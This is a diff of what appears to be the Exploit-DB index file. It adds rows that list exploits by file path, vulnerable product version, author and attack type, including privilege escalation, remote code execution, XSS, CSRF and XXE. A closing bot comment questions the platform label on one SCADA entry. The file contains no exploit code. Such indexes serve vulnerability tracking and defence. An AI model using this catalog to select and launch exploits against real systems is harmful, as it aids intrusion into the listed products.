 44619,exploits/windows/dos/44619.cpp,"2345 Security Guard 3.7 - '2345NsProtect.sys' Denial of Service",2018-05-14,anhkgg,dos,windows,
+44629,exploits/ios/dos/44629.py,"WhatsApp 2.18.31 - Memory Corruption",2018-05-16,"Juan Sacco",dos,ios,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9712,6 +9713,8 @@ id,file,description,date,author,type,platform,port
 44601,exploits/linux/local/44601.txt,"GNU wget - Cookie Injection",2018-05-06,"Harry Sintonen",local,linux,
 44603,exploits/windows/local/44603.txt,"Microsoft Windows FxCop 10/12 - XML External Entity Injection",2018-05-09,hyp3rlinx,local,windows,
 44614,exploits/windows/local/44614.txt,"EMC RecoverPoint 4.3 - 'Admin CLI' Command Injection",2018-05-11,"Paul Taylor",local,windows,
+44630,exploits/windows/local/44630.txt,"Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation",2018-05-16,"Google Security Research",local,windows,
+44633,exploits/linux/local/44633.rb,"Libuser - roothelper Privilege Escalation (Metasploit)",2018-05-16,Metasploit,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16487,6 +16490,7 @@ id,file,description,date,author,type,platform,port
 44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
 44611,exploits/php/remote/44611.rb,"Mantis 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit)",2018-05-10,Metasploit,remote,php,80
 44616,exploits/windows/remote/44616.py,"Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution",2018-05-13,vportal,remote,windows,
+44635,exploits/hardware/remote/44635.py,"Inteno IOPSYS 2.0 - 4.2.0 p910nd - Remote Command Execution",2018-05-16,neonsea,remote,hardware,9100
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39309,3 +39313,11 @@ id,file,description,date,author,type,platform,port
 44621,exploits/php/webapps/44621.txt,"Monstra CMS 3.0.4 - Remote Code Execution",2018-05-14,JameelNabbo,webapps,php,
 44622,exploits/php/webapps/44622.txt,"XATABoost 1.0.0 - SQL Injection",2018-05-14,MgThuraMoeMyint,webapps,php,
 44623,exploits/multiple/webapps/44623.txt,"JasperReports - Authenticated File Read",2018-05-03,"Hector Monsegur",webapps,multiple,
+44624,exploits/php/webapps/44624.txt,"MyBB Admin Notes Plugin 1.1 - Cross-Site Request Forgery",2018-05-16,0xB9,webapps,php,
+44625,exploits/php/webapps/44625.txt,"VirtueMart 3.1.14 - Persistent Cross-Site Scripting",2018-05-16,"Mattia Furlani",webapps,php,
+44626,exploits/windows/webapps/44626.txt,"Rockwell Scada System 27.011 - Cross-Site Scripting",2018-05-16,t4rkd3vilz,webapps,windows,
+44627,exploits/php/webapps/44627.txt,"Multiplayer BlackJack Online Casino Game 2.5 - Persistent Cross-Site Scripting",2018-05-16,L0RD,webapps,php,
+44628,exploits/linux/webapps/44628.txt,"Horse Market Sell & Rent Portal Script 1.5.7 - Cross-Site Request Forgery",2018-05-16,L0RD,webapps,linux,
+44631,exploits/asp/webapps/44631.html,"totemomail Encryption Gateway 6.0.0 Build 371 - Cross-Site Request Forgery",2018-05-16,"Compass Security",webapps,asp,
+44632,exploits/php/webapps/44632.html,"WordPress Plugin Metronet Tag Manager 1.2.7 - Cross-Site Request Forgery",2018-05-16,dxw,webapps,php,80
+44634,exploits/java/webapps/44634.txt,"RSA Authentication Manager 8.2.1.4.0-build1394922 / < 8.3 P1 - XML External Entity Injection / Cross-Site Flashing / DOM Cross-Site Scripting",2018-05-16,"SEC Consult",webapps,java,
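Review bot: The new 44626 row in this hunk files the Rockwell entry under platform `windows`, while the advisory it indexes (exploits/windows/webapps/44626.txt) lists 1769-series controller firmware (Version 27.011 and earlier, 20.018 and earlier) as the affected product and names Windows only as the tester's machine and browsers. If the platform column describes the affected product rather than the test host, `hardware` — the value the 44635 row in the previous hunk uses for the Inteno IOPSYS device — looks like the more accurate classification, and by the path convention the other rows follow the file would then sit under exploits/hardware/webapps/ instead. Defenders who match this index against asset inventories by platform would otherwise not see a controller-firmware issue when filtering for embedded or hardware targets. I may be misreading the intended semantics of the column, so this is a question for the index maintainers rather than a hard defect.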